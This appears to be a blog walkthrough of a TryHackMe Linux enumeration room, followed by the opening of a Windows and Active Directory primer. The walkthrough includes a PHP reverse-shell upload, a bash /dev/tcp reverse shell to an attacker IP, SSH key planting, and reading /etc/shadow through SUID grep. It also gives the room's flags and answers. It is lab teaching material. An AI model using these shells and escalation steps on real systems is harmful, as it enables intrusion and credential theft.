
  • TryHackMe Linux: Local Enumeration

     


     

    Local Enumeration - Learn to efficiently enumerate a Linux machine and identify possible weaknesses.


    Have you ever found yourself in a situation where you have no idea about "what to do after getting a reverse shell (access to a machine)"?


    If your answer was "Yes", this room is definitely for you. This room aims at providing a beginner's basis in box enumeration, giving a detailed approach towards it.

     

    Here's a list of units that are going to be covered in this room:

    • Unit 1 - Stabilizing the shell: exploring a way to transform a reverse shell into a stable bash or ssh shell.
    • Unit 2 - Basic enumeration: enumerate the OS and the most common files to identify possible security flaws.
    • Unit 3 - /etc: understand the purpose and sensitivity of the files under the /etc directory.
    • Unit 4 - Important files: learn to find files containing potentially valuable information.
    • Unit 6 - Enumeration scripts: automate the process by running multiple community-created enumeration scripts.


     

    Browse to MACHINE_IP:3000 and follow the instructions.
    To continue with the room material, you need to get a reverse shell using a PHP payload and a netcat listener (nc -lvnp 1234).

    Start up the machine from TryHackMe and go to the URL Machine_IP:3000.

    Download the PHP payload (linked in the original post) and change the IP and port number in it to your tun0 IP (check your tun0 IP in your terminal with sudo ifconfig). Rename the file from php-reverse-shell.php to "cmd.php" (Method 2), then go to Machine_IP:3000/cmd.php and upload your reverse shell.

    Now go to the URL http://Machine_IP:3000/cmd.php. Then go to your command line and open a netcat listener on the port you set in the PHP payload (a reverse shell cheatsheet is linked in the original post):

    nc -nvlp 1234

    Now enter this bash reverse shell in the box and hit enter: bash -c 'bash -i >& /dev/tcp/10.8.61.234/1234 0>&1'

    Our tun0 IP with port :- 10.8.61.234/1234




    Task 2 Unit 1 - tty


    As you might have noticed, a netcat reverse shell is pretty useless and can be easily broken by simple mistakes.


    In order to fix this, we need to get a 'normal' shell, aka tty (text terminal).
    Note: Mainly, we want to upgrade to tty because commands like su and sudo require a proper terminal to run.



    One of the simplest methods for that would be to execute /bin/bash. In most cases, it's not that easy to do and it actually requires us to do some additional work.
    Surprisingly enough, we can use python to execute /bin/bash and upgrade to tty:
    python3 -c 'import pty; pty.spawn("/bin/bash")'


    Generally speaking, you want to use an external tool to execute /bin/bash for you. While doing so, it is a good idea to try everything you know, starting from python, finishing with getting a binary on the target system.
     

    List of static binaries you can get on the system: github.com/andrew-d/static-binaries

     

    Try experimenting with the netcat shell you obtained in the previous task and try different versions.
     

     

    Read more about upgrading to TTY: blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys
     

    1) How would you execute /bin/bash with perl?

    HINT :- Research! Maybe GTFOBins will give you an idea

    Ans :- perl -e 'exec "/bin/bash";'



    Task 3 Unit 1 - ssh


    To make things even better, you should always try to get a proper ssh shell on the box.

    The id_rsa file contains a private key that can be used to connect to a box via ssh. It is usually located in the .ssh folder in the user's home folder (full path: /home/user/.ssh/id_rsa).

    Get that file on your system, give it read-only permissions (chmod 600 id_rsa) and connect by executing ssh -i id_rsa user@ip.

    If the target box does not have a generated id_rsa file (or you simply don't have read permission for it), you can still gain stable ssh access. All you need to do is generate your own key pair on your system and add the associated public key to the authorized_keys file on the target machine.

    Execute ssh-keygen and you should see id_rsa and id_rsa.pub files appear in your own .ssh folder. Copy the content of the id_rsa.pub file and put it inside the authorized_keys file on the target machine (located in the .ssh folder). After that, connect to the machine using your id_rsa file.








    1) Where can you usually find the id_rsa file? (User = user)

    Ans :- /home/user/.ssh/id_rsa

     

    2)Is there an id_rsa file on the box? (yay/nay)

    Ans :- nay 




    Task 4 Unit 2 - Basic enumeration


    Once you get on the box, it's crucially important to do the basic enumeration. In some cases, it can save you a lot of time and provide you a shortcut into escalating your privileges to root.

    > First, let's start with the uname command. uname prints information about the system.









    Execute uname -a to print out all information about the system.
    This simple box enumeration allows you to get initial information about the box, such as distro type and version. From this point you can easily look for known exploits and vulnerabilities.

    > Next in our list are auto-generated bash files.
    Bash keeps track of our actions by writing the commands we use, in plaintext, to a history file (~/.bash_history).

    If you happen to have read permission on this file, you can easily enumerate the system user's actions and retrieve some sensitive information, such as plaintext passwords or privilege escalation methods.

    .bash_profile and .bashrc are files containing shell commands that are run when Bash is invoked. These files can contain some interesting start-up settings that can potentially reveal some information to us. For example, a bash alias can point towards an important file or process.


    > The next thing that you want to check is the sudo version.
    The sudo command is one of the most common targets in privilege escalation. Its version can help you identify known exploits and vulnerabilities. Execute sudo -V to retrieve the version.


    For example, sudo versions < 1.8.28 are vulnerable to CVE-2019-14287, a vulnerability that allows gaining root access with one simple command.
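    The version comparison above is easy to get wrong in a script, because comparing version strings lexically puts 1.8.9 after 1.8.28. The following is an added example (not from the room or from the sudo project) that parses the first line of sudo -V output and compares it numerically against the 1.8.28 threshold the text states; the sample output is constructed.

```python
"""Added example: parse `sudo -V` and check the version against the CVE-2019-14287
threshold stated in the text (versions below 1.8.28 are affected)."""
import re

CVE_2019_14287_FIXED_IN = (1, 8, 28)

VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")

def parse_sudo_version(sudo_v_output: str) -> tuple:
    """Pull the numeric version out of the 'Sudo version' line of `sudo -V` output.
    Patch suffixes such as the 'p2' in 1.8.21p2 are ignored."""
    match = VERSION_RE.search(sudo_v_output)
    if not match:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(part) for part in match.groups())

def is_vulnerable_cve_2019_14287(version: tuple) -> bool:
    # Compare tuples of integers: comparing the strings would sort "1.8.9" after "1.8.28"
    return version < CVE_2019_14287_FIXED_IN

def check_sudo(sudo_v_output: str) -> str:
    """One-line verdict for a captured `sudo -V` output."""
    version = parse_sudo_version(sudo_v_output)
    dotted = ".".join(map(str, version))
    if is_vulnerable_cve_2019_14287(version):
        return f"sudo {dotted}: below 1.8.28, check CVE-2019-14287"
    return f"sudo {dotted}: not affected by CVE-2019-14287"

# Constructed sample of the first two lines `sudo -V` prints for an unprivileged user
SAMPLE_SUDO_V = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"

if __name__ == "__main__":
    print(check_sudo(SAMPLE_SUDO_V))
```

    Note that the version check is only a pointer: whether CVE-2019-14287 is actually usable also depends on the sudoers configuration, which is why the text moves on to sudo -l next.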

     

    > The last part of basic enumeration comes down to using our sudo rights.
    Users can be granted sudo via the /etc/sudoers file. It's a fully customizable file that can either limit or open access to a wider range of permissions. Run sudo -l to check if the user on the box is allowed to use sudo with any command on the system.







     

    Most of those commands give us an opportunity to escalate our privileges via simple tricks described in GTFOBins:
    https://gtfobins.github.io/#+sudo


    Note: The output in the picture demonstrates that the user may run ALL commands on the system with sudo rights. This configuration is the easiest way to get root.




     

    1) How would you print machine hardware name only?

    Ans :- uname -m




    2) Where can you find bash history?

    Ans :- ~/.bash_history



    3) What's the flag?

    Ans :- thm{clear_the_history}




    Task 5 Unit 3 - /etc

     
    Etc (etcetera) - unspecified additional items. Generally speaking, /etc folder is a central location for all your configuration files and it can be treated as a metaphorical nerve center of your Linux machine.

    Each of the files located there has its own unique purpose that can be used to retrieve some sensitive information (such as passwords). The first thing you want to check is if you are able to read and write the files in /etc folder. Let's take a look at each file specifically and figure out the way you can use them for your enumeration process.

    > /etc/passwd


    This file stores the most essential information, required during the user login process. (It stores user account information). It's a plain-text file that contains a list of the system's accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

    Read the /etc/passwd file by running cat /etc/passwd and let's take a closer look.









    Each line of this file represents a different account, created in the system. Each field is separated with a colon (:) and carries a separate value.

    goldfish:x:1003:1003:,,,:/home/goldfish:/bin/bash



    1. (goldfish) - Username
    2. (x) - Password. (x character indicates that an encrypted account password is stored in /etc/shadow file and cannot be displayed in the plain text here)
    3. (1003) - User ID (UID): Each non-root user has his own UID (1-99). UID 0 is reserved for root.
    4. (1003) - Group ID (GID): Linux group ID
    5. (,,,) - User ID Info: A field that contains additional info, such as phone number, name, and last name. (,,, in this case means that I did not input any additional info while creating the user)
    6. (/home/goldfish) - Home directory: A path to user's home directory that contains all the files related to them.
    7. (/bin/bash) - Shell or a command: Path of a command or shell that is used by the user. Simple users usually have /bin/bash as their shell, while services run on /usr/sbin/nologin.



    How can this help? Well, if you have at least read access to this file, you can easily enumerate all existing users, services and other accounts on the system. This can open a lot of vectors for you and lead to the desired root.

    Otherwise, if you have write access to /etc/passwd, you can easily get root by creating a custom entry with root privileges.
    (For more info: http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation)



    > /etc/shadow








    The /etc/shadow file stores the actual passwords in hashed form (often loosely called "encrypted") for each user account, together with additional properties related to the user's password. Those password hashes have a similar structure, making it easy for us to identify the hashing format and crack the hash to get the password.

    So, as you might have guessed, we can use /etc/shadow to retrieve different users' passwords. In most situations, having read permission on this file is more than enough to escalate to root privileges.
     

    cat /etc/shadow


    goldfish:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAMWf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:7:::

     

    1. (goldfish) - Username
    2. ($6$1FiLdnFwT...) - Password: the hashed password.
    Basic structure: $id$salt$hashed, where $id identifies the algorithm used on GNU/Linux as follows:
    - $1$ is MD5
    - $2a$ is Blowfish
    - $2y$ is Blowfish
    - $5$ is SHA-256
    - $6$ is SHA-512
    3. (18483) - Last password change: days since Jan 1, 1970 that the password was last changed.
    4. (0) - Minimum: the minimum number of days required between password changes (zero means the password can be changed immediately).
    5. (99999) - Maximum: the maximum number of days the password is valid.
    6. (7) - Warn: the number of days before expiry that the user will be warned about changing their password.


     

    What can we get from here? Well, if we have read permission for this file, we can crack the hashed passwords using one of the cracking methods.

    Just like with /etc/passwd, write permission can allow us to add a new root user by making a custom entry.
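    The two file formats described above (/etc/passwd and /etc/shadow) can be parsed field by field and checked for exactly the conditions the text calls out: extra UID 0 entries, weak or empty hashes, and password ageing that never expires. The following is an added example, not code from the room; the sample entries are constructed, except the goldfish lines, which are the ones shown above.

```python
"""Added example: parse /etc/passwd and /etc/shadow entries and report what an
auditor looks for in them. Sample lines are constructed, except the goldfish
lines, which are the ones shown in the room."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# $id$ prefixes and the algorithms they denote, as listed above
HASH_ALGORITHMS = {"1": "MD5", "2a": "Blowfish", "2y": "Blowfish",
                   "5": "SHA-256", "6": "SHA-512"}

@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

def parse_passwd_line(line: str) -> PasswdEntry:
    # name:password:UID:GID:user-info:home:shell ('x' means the hash lives in /etc/shadow)
    name, _password, uid, gid, gecos, home, shell = line.rstrip("\n").split(":")
    return PasswdEntry(name, int(uid), int(gid), gecos, home, shell)

@dataclass
class ShadowEntry:
    name: str
    algorithm: str                 # algorithm name, or "locked" / "empty" / "unknown"
    last_change: Optional[date]
    max_days: Optional[int]

def parse_shadow_line(line: str) -> ShadowEntry:
    name, hashed, last, _min_days, max_days = line.rstrip("\n").split(":")[:5]
    parts = hashed.split("$")      # "$id$salt$hash" -> ["", id, salt, hash]
    if hashed == "":
        algorithm = "empty"
    elif hashed.startswith(("!", "*")):
        algorithm = "locked"       # a leading ! or * disables password login
    elif len(parts) >= 4:
        algorithm = HASH_ALGORITHMS.get(parts[1], "unknown")
    else:
        algorithm = "unknown"
    last_change = date(1970, 1, 1) + timedelta(days=int(last)) if last else None
    return ShadowEntry(name, algorithm, last_change, int(max_days) if max_days else None)

def audit_passwd(lines):
    """Flag extra UID-0 accounts and system accounts that still have a login shell."""
    findings = []
    for e in map(parse_passwd_line, lines):
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 but not root")
        elif 0 < e.uid < 1000 and not e.shell.endswith(("nologin", "false")):
            findings.append(f"{e.name}: system account with login shell {e.shell}")
    return findings

def audit_shadow(lines):
    """Flag empty password fields, MD5 hashes and passwords that never expire."""
    findings = []
    for e in map(parse_shadow_line, lines):
        if e.algorithm == "empty":
            findings.append(f"{e.name}: empty password field")
        elif e.algorithm == "MD5":
            findings.append(f"{e.name}: weak MD5 ($1$) hash")
        if e.algorithm not in ("empty", "locked") and (e.max_days or 0) >= 99999:
            findings.append(f"{e.name}: password never expires")
    return findings

# Constructed sample files (every account except goldfish is made up for the demo)
PASSWD_SAMPLE = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "www-data:x:33:33:www-data:/var/www:/bin/bash",
    "goldfish:x:1003:1003:,,,:/home/goldfish:/bin/bash",
    "backdoor:x:0:0::/root:/bin/bash",
]
SHADOW_SAMPLE = [
    "root:!:18483:0:99999:7:::",
    "goldfish:$6$1FiLdnFwTwNWAqYN$WAdBGfhpwSA4y5CHGO0F2eeJpfMJAM"
    "Wf6MHg7pHGaHKmrkeYdVN7fD.AQ9nptLkN7JYvJyQrfMcfmCHK34S.a/:18483:0:99999:7:::",
    "legacy:$1$abcdefgh$ijklmnopqrstuvwxyz012:18000:0:90:7:::",
    "guest::18483:0:99999:7:::",
]

if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE) + audit_shadow(SHADOW_SAMPLE):
        print(finding)
```

    The "days since 1970" field is the one people misread most often: 18483 in the goldfish line works out to 9 August 2020, which the parser computes with a timedelta rather than by hand.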



    > /etc/hosts


    /etc/hosts is a simple text file that allows users to assign a hostname to a specific IP address. Generally speaking, a hostname is a name that is assigned to a certain device on a network. It helps to distinguish one device from another. The hostname for a computer on a home network may be anything the user wants, for example, DesktopPC or MyLaptop.

    You can try editing your own /etc/hosts file by adding the MACHINE_IP there, mapped to the name box.thm, like so:



     


    From now on you'll be able to refer to the box as box.thm.

    Why do we need it? In real-world pentesting this file may reveal the local addresses of devices on the same network. It can help us to enumerate the network further.
     

    1) Can you read /etc/passwd on the box? (yay/nay)

    Ans :- yay




    Task 6 Unit 4 - Find command and interesting files


    Since it's physically impossible to browse the whole filesystem by hand, we'll be using the find command for this purpose.
     



    The most important switches for us in our enumeration process are -type and -name.

    The first one allows us to limit the search to files only (-type f) and the second one allows us to search for files by extension using the wildcard (*).





    Basically, what you want to do is to look for interesting log (.log) and configuration files (.conf). In addition to that, the system owner might be keeping backup files (.bak).

    Here's a list of file extensions you'd usually look for: see the "Common Linux File Extension" link in the Bonus section at the end of this post.
     

     

     


     

     


     


    To find the password I used the command:

    find -type f -name "*.bak" 2>/dev/null

    OR

    locate .bak

    To find the flag we can use the same commands, only searching for a file called flag.conf, as the task asks to find a flag and the hint said it could be in a .conf file:

    find / -type f -name "flag.conf" 2>/dev/null

    OR

    locate flag.conf

     

     

    1) What's the password you found?

    Ans :- THMSkidyPass


    2) Did you find a flag?

    Ans :- thm{conf_file}




    Task 7 Unit 4 - SUID


    Set User ID (SUID) is a type of permission that allows users to execute a file with the permissions of another user.


    Those files which have SUID permissions run with higher privileges. Assume we are accessing the target system as a non-root user and we find SUID-enabled binaries; those files/programs/commands can then be run with root privileges.

    SUID abuse is a common privilege escalation technique that allows us to gain root access by executing a root-owned binary with SUID enabled.

     

    You can find all SUID files by executing this simple find command:

    find / -perm -u=s -type f 2>/dev/null


    OR


    find / -perm -4000 2>/dev/null

    -perm -u=s matches files with the SUID bit set (in practice mostly root-owned binaries); -perm -4000 is the same test written numerically.
    -type f searches for files, not directories.


     

    After displaying all SUID files, compare them to a list on GTFObins to see if there's a way to abuse them to get root access.
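    The find commands above list every SUID file; what you then do with the list is compare it against something. The following is an added example, not from the room, that implements the same test as find / -perm -4000 -type f over a directory tree and diffs the result against a baseline of expected SUID binaries, which is how a defender spots an unexpected SUID bit (on the box in the room, the same diff is what you do by hand against GTFOBins). The directory tree, the file names and the baseline are constructed for the demo.

```python
"""Added example: list SUID files under a directory tree and compare them with
an expected baseline. The tree and the baseline are constructed for the demo."""
import os
import stat
import tempfile

def find_suid_files(root: str):
    """Return paths (relative to root) of regular files with the SUID bit set,
    i.e. what `find ROOT -perm -4000 -type f 2>/dev/null` prints."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue   # unreadable entry; the shell version hides these with 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(os.path.relpath(path, root))
    return sorted(found)

# Constructed baseline: the SUID binaries a hypothetical build is expected to ship
EXPECTED_SUID = {"usr/bin/passwd", "usr/bin/sudo"}

def unexpected_suid(found, baseline=EXPECTED_SUID):
    """SUID files that are not on the baseline; these are the ones to look up on GTFOBins."""
    return sorted(set(found) - set(baseline))

def build_sample_tree() -> str:
    """Constructed mini filesystem: four scripts, three of them SUID (grep is the odd one out)."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for rel, suid in [("usr/bin/passwd", True), ("usr/bin/sudo", True),
                      ("usr/bin/grep", True), ("usr/bin/ls", False)]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o4755 if suid else 0o755)   # leading 4 = setuid bit, as in -perm -4000
    return root

if __name__ == "__main__":
    tree = build_sample_tree()
    suid_files = find_suid_files(tree)
    print("SUID files:", suid_files)
    print("not on baseline:", unexpected_suid(suid_files))
```

    os.lstat is used deliberately so that a symlink pointing at a SUID binary is not itself reported, matching find's default of not following links.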
     

     


     


     

     


    1) Which SUID binary has a way to escalate your privileges on the box?

    Ans :- grep


     

    2) What's the payload you can use to read /etc/shadow with this SUID?

    Ans :-  grep ' ' /etc/shadow





    Task 8 [Bonus] - Port Forwarding


    According to Wikipedia, "Port forwarding is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall".

     

    Port forwarding not only allows you to bypass firewalls but also gives you an opportunity to enumerate some local services and processes running on the box.

    The Linux netstat command gives you a bunch of information about your network connections, the ports that are in use, and the processes using them. In order to see all TCP connections, execute netstat -at | less. This will give you a list of running processes that use TCP. From this point, you can easily enumerate running processes and gain some valuable information.

    netstat -tulpn will provide you a much nicer output with the most interesting data.





    Read more about port forwarding here: fumenoid.github.io/posts/port-forwarding
    Try using those commands on your system!
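    The services that port forwarding lets you reach are precisely the ones netstat shows bound to the loopback address only. The following is an added example, not code from the room, that parses netstat -tulpn output into structured records and picks out those loopback-only listeners; the sample output is constructed, including the "-" entry netstat prints when it cannot see the owning process of another user's socket.

```python
"""Added example: parse `netstat -tulpn` output and pick out the listeners that
are bound to loopback only. The sample output below is constructed."""

SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1044/mysqld
tcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      1301/php
tcp6       0      0 :::80                   :::*                    LISTEN      920/apache2
udp        0      0 127.0.0.1:8125          0.0.0.0:*                           1377/statsd
"""

def parse_netstat_tulpn(output: str):
    """Return one dict per socket row: proto, host, port, pid, program."""
    sockets = []
    for line in output.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith(("tcp", "udp")):
            continue                      # header lines
        proto, local = fields[0], fields[3]
        # UDP rows have no State column, so PID/Program name is one field earlier
        pidprog = fields[6] if proto.startswith("tcp") else fields[5]
        host, port = local.rsplit(":", 1)  # also handles IPv6 forms such as ":::80"
        pid, _, program = pidprog.partition("/")
        sockets.append({
            "proto": proto,
            "host": host,
            "port": int(port),
            "pid": int(pid) if pid.isdigit() else None,
            # "-" means netstat could not see the owning process (it belongs to another
            # user and you are not root): the listener is real, just unattributed
            "program": program or "-",
        })
    return sockets

def loopback_only(sockets):
    """Listeners reachable only from the box itself, as (proto, port, program) tuples."""
    return [(s["proto"], s["port"], s["program"]) for s in sockets
            if s["host"] == "::1" or s["host"].startswith("127.")]

if __name__ == "__main__":
    for entry in loopback_only(parse_netstat_tulpn(SAMPLE_NETSTAT)):
        print(entry)
```

    From a defender's side the same parse answers the inverse question: which services are bound to 0.0.0.0 or :: and therefore exposed to the network when they could have been loopback-only.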




    Task 9 Unit 5 - Automating scripts


    Even though I, personally, dislike any automatic enumeration scripts, they are really important to the privilege escalation process as they help you to omit the 'human error' in your enum process.

    > Linpeas

    LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) is a script that searches for possible paths to escalate privileges on Linux hosts.

    Linpeas automatically searches for passwords, SUID files and Sudo right abuse to hint you on your way towards root.


     


     

    There are different ways of getting the script onto the box, but the most reliable one would be to first download the script on your system and then transfer it to the target.

    wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

     

    After that, you get a nice output with all the vulnerable parts marked.

    > LinEnum

    The second tool on our list is LinEnum. It performs 'Scripted Local Linux Enumeration & Privilege Escalation Checks' and appears to be a bit easier than linpeas.



    You can get the script by running:


    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    Now, as you have two tools on the box, try running both of them and see if either of them shows something interesting!


    Please note: It's always a good idea to run multiple scripts separately and compare their output, as each one of them has its own specific scope of exploration.




    Task 10 Resources and what's next?


    Congratulations! You have successfully gone through Linux local enumeration!
    Now you can understand the main concepts of manual and automatic enumeration which will lead you towards obtaining root!


    We recommend you continue your education by completing these awesome rooms, covering more in-depth privilege escalation:

    1. https://tryhackme.com/room/sudovulnsbypass
    2. https://tryhackme.com/room/commonlinuxprivesc
    3. https://tryhackme.com/room/linuxprivesc


    After doing so, you can practice your skills by completing these easy challenge machines:

    1. https://tryhackme.com/room/vulnversity
    2. https://tryhackme.com/room/basicpentestingjt
    3. https://tryhackme.com/room/bolt
    4. https://tryhackme.com/room/tartaraus
     

    Bonus :-


    1) Common Linux File Extension :-  https://lauraliparulo.altervista.org/most-common-linux-file-extensions/

    2) Port Forwarding :- https://fumenoid.github.io/posts/port-forwarding

    3) Local File Enumeration Scripts :- https://github.com/Arr0way/linux-local-enumeration-script

    4) For "Clear" Command Fix :- export TERM=xterm




    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • Intro to windows - active directory and Azure active directory


     

     

    Windows history


    On November 20, 1985 Microsoft announced its operating system named Windows, a graphical operating system shell created as a response to the growing popularity of GUIs (graphical user interfaces). At the moment Windows dominates the world of computers with around 90% market share, having overtaken Apple's Mac OS, which was introduced in 1984.



    Windows versions:

    •     Windows 1
    •     Windows 2
    •     Windows 2.x
    •     Windows 3.x
    •     Windows 95
    •     Windows 98
    •     Windows NT
    •     Windows XP
    •     Windows Vista
    •     Windows 7
    •     Windows 8.x
    •     Windows 10



    Windows server versions:



    •     Windows Server 2003
    •     Windows Server 2008
    •     Windows Server 2012 / 2012 R2
    •     Windows Server 2016
    •     Windows Server 2019


    Read a little about Windows history and versions.

    1) When was Windows announced?

    Ans :- November 20 1985



    2) Which is the latest version of Windows?

    Ans :- windows 10



    3) Which is the latest version of Windows Server?


    Ans :- windows server 2019




    Task 2 Windows file system and permissions explained


    What is the file system?



    It is the method and data structure that an operating system uses to keep track of files on a disk or partition. Without a file system, the information saved in a storage media would be one large body of data with no way to tell where the information begins and ends.



    Windows file system structure is:


    • Logical drives (Ex: Local Disk C)
    • Folders (these are the folders that come by default. Ex: Documents, Downloads, Music)
    • Files




    Something that might also interest you would be the folders located on the C drive and their role. These folders are:



    •     PerfLogs
    •     Program Files
    •     Program Files (x86)
    •     Users
    •     Windows




    Let me break them down and explain each of them:


    • PerfLogs - Stores system issues and other reports regarding performance
    • Program Files and Program Files (x86) - The location where programs install unless you change their path (Ex: choosing to install software on the D drive)
    • Users - This folder stores the user profiles that have been created, together with user-generated data (Ex: saving a file on your Desktop)
    • Windows - The folder that basically contains the code to run the operating system and some utility tools (we'll talk about them later)

     

     

     


     

     


    File permissions


    File permissions can be set by an administrator or a privileged account. These permissions can be applied to:

    •     Users
    •     Groups

       

    Permissions that can be set are:


    •     Full control
    •     Modify
    •     Read & execute
    •     List folders content
    •     Read
    •     Write
    •     Special permissions

       
       

    • Full control - allows the user/users/group/groups to set the ownership of the folder, set permissions for others, modify, read, write, and execute files.
    • Modify - allows the user/users/group/groups to modify, read, write, and execute files.
    • Read & execute - allows the user/users/group/groups to read and execute files.
    • List folder contents - allows the user/users/group/groups to list the contents (files, subfolders, etc) of a folder.
    • Read - only allows the user/users/group/groups to read files.
    • Write - allows the user/users/group/groups to write data to the specified folder (automatically set when the "Modify" right is checked).

     


    Note: You can allow or deny permissions for users or groups.

    To set permissions for a file or folder right click on the file and select "Properties". Go to the "Security" tab and click on the "Edit" button.

     

     




     

    As you can see Users can only read, execute, and list the folder contents. However, we want to allow them to be able to store, edit, or delete files inside that folder. To do that, check the "Modify" box (you will see that by checking the Modify box the Write box will be automatically checked too).




     

    To apply the changes click on the "Apply" button.



    The reason we do not set the full control permission on the folder is that users could set permissions and take ownership of the folder themselves (without the action of an administrator/privileged user).

    A tool you can use to check the files or folder permissions is "icacls".




     

    Let's explain what those letters in parentheses mean, as right now you might be confused.

    • I - permission inherited from the parent container
    • F - full access (full control)
    • M - Modify right/access
    • OI - object inherit
    • IO - inherit only
    • CI - container inherit
    • RX - read and execute
    • AD - append data (add subdirectories)
    • WD - write data and add files




    You can use icacls to check permissions, set ownership of the folder, set, remove or deny permissions. An example would be setting the ownership of the folder to Users.


    To check if that applied you can right-click on the folder and select "Properties", go to the "Security" tab, and click on "Advanced". There you should be able to see that the owner is "Users".
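    The icacls output described above has a regular shape (principal, then a run of parenthesised flags) and can be parsed rather than read by eye. The following is an added example, not code from the room or from Microsoft, that parses constructed icacls output for a hypothetical folder C:\Shared, expands the flag letters using the meanings listed above, merges the rights per principal, and reports who holds full control, which is the check the text says you would otherwise do through the Properties dialog.

```python
"""Added example: parse icacls output, explain the flags using the table above,
and report which principals have full control. The sample output is constructed."""
import re

# Flag meanings as listed in the explanation above
FLAG_MEANINGS = {
    "I": "permission inherited from the parent container",
    "F": "full access (full control)",
    "M": "modify right/access",
    "OI": "object inherit",
    "IO": "inherit only",
    "CI": "container inherit",
    "RX": "read and execute",
    "AD": "append data (add subdirectories)",
    "WD": "write data and add files",
}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO"}   # describe propagation, not access

# Constructed icacls output for a hypothetical folder C:\Shared; the first line carries
# the path in front of the first ACE, the remaining ACEs are indented under it
SAMPLE_ICACLS = r"""C:\Shared BUILTIN\Administrators:(I)(OI)(CI)(F)
          BUILTIN\Users:(I)(OI)(CI)(RX)
          BUILTIN\Users:(I)(CI)(AD)
          BUILTIN\Users:(I)(CI)(WD)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE is "<principal>:(FLAG)(FLAG)..." at the end of a line. Principals are
# DOMAIN\name (the well-known domains may contain a space), Everyone, or a raw SID.
ACE_RE = re.compile(
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|BUILTIN|\S+?)\\[^:\\]+|Everyone|S-1-[\d-]+)"
    r":(?P<flags>(?:\([A-Z,]+\))+)$"
)

def parse_icacls(output: str):
    """Return a list of (principal, [flags]) tuples, one per ACE line."""
    aces = []
    for line in output.splitlines():
        match = ACE_RE.search(line.rstrip())
        if match:
            flags = re.findall(r"\(([A-Z,]+)\)", match.group("flags"))
            aces.append((match.group("principal"), flags))
    return aces

def explain(flags):
    """Human-readable meaning of each flag letter."""
    return [FLAG_MEANINGS.get(flag, f"unknown flag {flag}") for flag in flags]

def rights_by_principal(aces):
    """Merge the access rights of all ACEs per principal, ignoring inheritance flags."""
    rights = {}
    for principal, flags in aces:
        rights.setdefault(principal, set()).update(set(flags) - INHERITANCE_FLAGS)
    return rights

def full_control_principals(aces):
    """Principals holding (F); the text explains why Users should not be among them."""
    return sorted(p for p, r in rights_by_principal(aces).items() if "F" in r)

if __name__ == "__main__":
    parsed = parse_icacls(SAMPLE_ICACLS)
    for principal, flags in parsed:
        print(principal, "->", "; ".join(explain(flags)))
    print("full control:", full_control_principals(parsed))
```

    In the sample, Users end up with RX plus AD and WD, i.e. they can add files and subfolders but not take ownership, which matches the Modify-without-Full-control setup the text recommends.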





    Read the above.

    In which folder are users profiles stored?


    Ans :- users

     

     

    Task 3 Understanding the authentication process



    What is authentication?


    Authentication is a process for verifying the identity of a person (or an object or a service). When you authenticate a person, the goal is to verify that the person is not an imposter.


    Local authentication


    Local authentication is done using the Local Security Authority (LSA). LSA is a protected subsystem that keeps track of the security policies and the accounts that are on a computer system. It also maintains information about all aspects of local security on a computer.



    Types of Active Directory

    There are two types of Active Directory:

    • On-Premise Active Directory (AD)
    • Azure Active Directory (AAD)




    Authentication on On-Premise Active Directory
     

     


     

     

